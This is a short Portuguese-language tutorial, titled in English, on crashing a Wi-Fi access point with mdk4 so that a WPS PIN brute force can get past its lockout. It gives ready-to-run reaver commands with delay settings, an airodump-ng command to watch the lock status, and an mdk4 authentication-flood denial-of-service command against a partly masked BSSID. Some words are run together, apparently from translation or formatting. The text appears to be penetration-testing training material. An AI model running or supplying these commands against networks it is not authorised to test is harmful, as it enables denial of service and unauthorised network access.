Crashing a Target AP with MDK4

Durante nossos esforços para recuperar o PIN e o WPA-PSK, é provável que encontremos um bloqueio de ponto de acesso em algum momento. Nesta seção, demonstraremos como inundar e travar o AP pode ser usado como um desvio potencial.

  • Podemos ignorar isso usando nosso comando avançado, especificando o período de suspensão e o tempo entre as tentativas:

sudo reaver -l 100 -r 3:45 -i wlan0mon -b 60:38:E0:XX:XX:XX -c 11

Ignorando o bloqueio de reinicialização do WPS por meio do MDK4

sudo reaver -l 100 -r 3:45 -i wlan0mon -b 60:38:E0:XX:XX:XX -c 11
  • No segundo terminal, podemos monitorar nosso WPS Lockedstatus com airodump-nge o --wpsfiltro. Também especificamos nosso BSSID e canal, para excluir quaisquer pontos de acesso adicionais de nossa lista.

airodump-ng --wps --bssid 60:38:E0:XX:XX:XX -c 11 wlan0mon
  • Em nosso terceiro terminal, podemos empregar o seguinte comando para testar Authentication Denial-of-Service flooding. Especificamos o módulo de ataque apara Authentication Denial-of-Service, e o endereço MAC do nosso ponto de acesso com -a

sudo mdk4 wlan0mon a -a 60:38:E0:XX:XX:XX

Last updated